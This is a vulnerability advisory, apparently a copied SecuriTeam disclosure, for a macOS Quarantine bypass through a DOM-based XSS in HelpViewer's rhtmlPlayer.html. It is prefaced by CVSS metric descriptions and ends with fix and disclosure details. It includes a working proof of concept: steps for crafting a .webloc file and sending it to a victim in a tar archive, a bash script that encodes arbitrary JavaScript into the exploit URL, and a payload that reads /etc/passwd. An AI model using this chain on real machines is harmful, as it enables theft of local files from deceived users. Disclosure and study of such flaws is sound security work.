The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Mac OS X Local Javascript Quarantine Bypass *youtube
Details
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the excution of arbitrary javascript commands in its (unrestricted) context.
A demo video is available at https://youtu.be/1jesuZXfMjI
The mentioned file is located at
/System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates the response content as javascript code.
The code below contains two different DOM Based XSS.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar archive (or any other format that supports extended attributes).
PoC:
To reproduce the issue follow the steps below:
create a javascript file you want to execute on your target
convert its content to base64
encode it to a "uri component" (ex with encodeURIComponent js function)
use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=
open it with Safari
save it as a bookmark
drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
create a tar archive containing the .webloc file
send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml="
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 "
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
The following javascript code will alert the /etc/passwd file on the victim's computer:
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this exploitation process it's not an issue since .webloc files are always opened with Safari.
Note
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this bug in Apple's changelog.
No CVE has been assigned by Apple.
Solution:
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html
Disclosure
This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum